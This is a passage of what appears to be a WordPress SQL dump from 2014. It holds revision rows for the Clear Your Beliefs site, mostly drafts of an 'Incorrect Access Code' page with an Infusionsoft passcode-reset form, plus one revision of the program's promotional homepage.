*</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:22:29', '2014-07-02 16:22:29', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1171, 4194, '2014-07-02 11:45:48', '2014-07-02 16:45:48', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto; text-align: center;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n<div class="infusion-submit"><input type="submit" value="Reset Passcode" /></div>\r\n</form>\r\n<p>&nbsp</p>\r\n<p>&nbsp</p>\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:45:48', '2014-07-02 16:45:48', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1172, 4194, '2014-07-02 11:46:30', '2014-07-02 16:46:30', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto; text-align: center;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n<div class="infusion-submit"><input type="submit" value="Reset Passcode" /></div>\r\n</form>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:46:30', '2014-07-02 16:46:30', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1173, 4194, '2014-07-02 11:50:56', '2014-07-02 16:50:56', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto; text-align: center;">\r\n<h1> Reset Passcode</h1>\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-submit" style="margin: 0 auto;"><input type="submit" value="Reset Passcode" /></div>\r\n</form>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:50:56', '2014-07-02 16:50:56', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1174, 4194, '2014-07-02 11:52:27', '2014-07-02 16:52:27', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto; text-align: center;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<h1> Reset Passcode</h1>\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-submit"><input type="submit" value="Reset Passcode" style="margin: 0 auto;" /></div>\r\n</form>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:52:27', '2014-07-02 16:52:27', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1175, 4194, '2014-07-02 11:58:42', '2014-07-02 16:58:42', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto; text-align: center;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<h1> Reset Passcode</h1>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-submit"><input type="submit" value="Reset Passcode" style="margin: 0 auto;" /></div>\r\n</form>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:58:42', '2014-07-02 16:58:42', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1176, 4194, '2014-07-02 11:59:30', '2014-07-02 16:59:30', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto; text-align: center;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<h1> Reset Passcode</h1>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n<p>&nbsp;</p>\r\n<div class="infusion-submit"><input type="submit" value="Reset Passcode" style="margin: 0 auto;" /></div>\r\n</form>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:59:30', '2014-07-02 16:59:30', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1177, 4194, '2014-07-02 19:26:33', '2014-07-03 00:26:33', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto; text-align: center;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<h1>Reset Passcode</h1>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-submit"><input style="margin: 0 auto;" type="submit" value="Reset Passcode" /></div>\r\n</form>&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 19:26:33', '2014-07-03 00:26:33', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(2020, 2, '2014-12-12 01:14:26', '2014-12-12 06:14:26', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center;padding-top: 30px !important;margin: 0px"><strong>Get the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong>for iPhone & iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-12-12 01:14:26', '2014-12-12 06:14:26', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1217, 4194, '2014-07-04 09:28:25', '2014-07-04 14:28:25', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto; text-align: center;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<h1>Reset Passcode</h1>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-submit"><input style="margin: 0 auto;" type="submit" value="Reset Passcode" /></div>\r\n</form>&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 09:28:25', '2014-07-04 14:28:25', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1219, 4194, '2014-07-04 09:36:18', '2014-07-04 14:36:18', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 09:36:18', '2014-07-04 14:36:18', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1218, 4194, '2014-07-04 09:29:53', '2014-07-04 14:29:53', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div id="verified" class="icon_box" style="width: 50%; margin: 0 auto; text-align: center;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<h1>Reset Passcode</h1>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-submit"><input style="margin: 0 auto;" type="submit" value="Reset Passcode" /></div>\r\n</form>&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 09:29:53', '2014-07-04 14:29:53', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1228, 4194, '2014-07-04 15:34:37', '2014-07-04 20:34:37', '<h1 style="text-align: center;">Reset Your Access Code &nbsp; &nbsp; &nbsp; &nbsp;</h1>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 15:34:37', '2014-07-04 20:34:37', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1225, 4194, '2014-07-04 10:20:10', '2014-07-04 15:20:10', '<h1 style="text-align: center;">Reset Your Passcode</h1>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 10:20:10', '2014-07-04 15:20:10', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1220, 4194, '2014-07-04 10:05:50', '2014-07-04 15:05:50', '<div id="init">\r\n<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 10:05:50', '2014-07-04 15:05:50', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
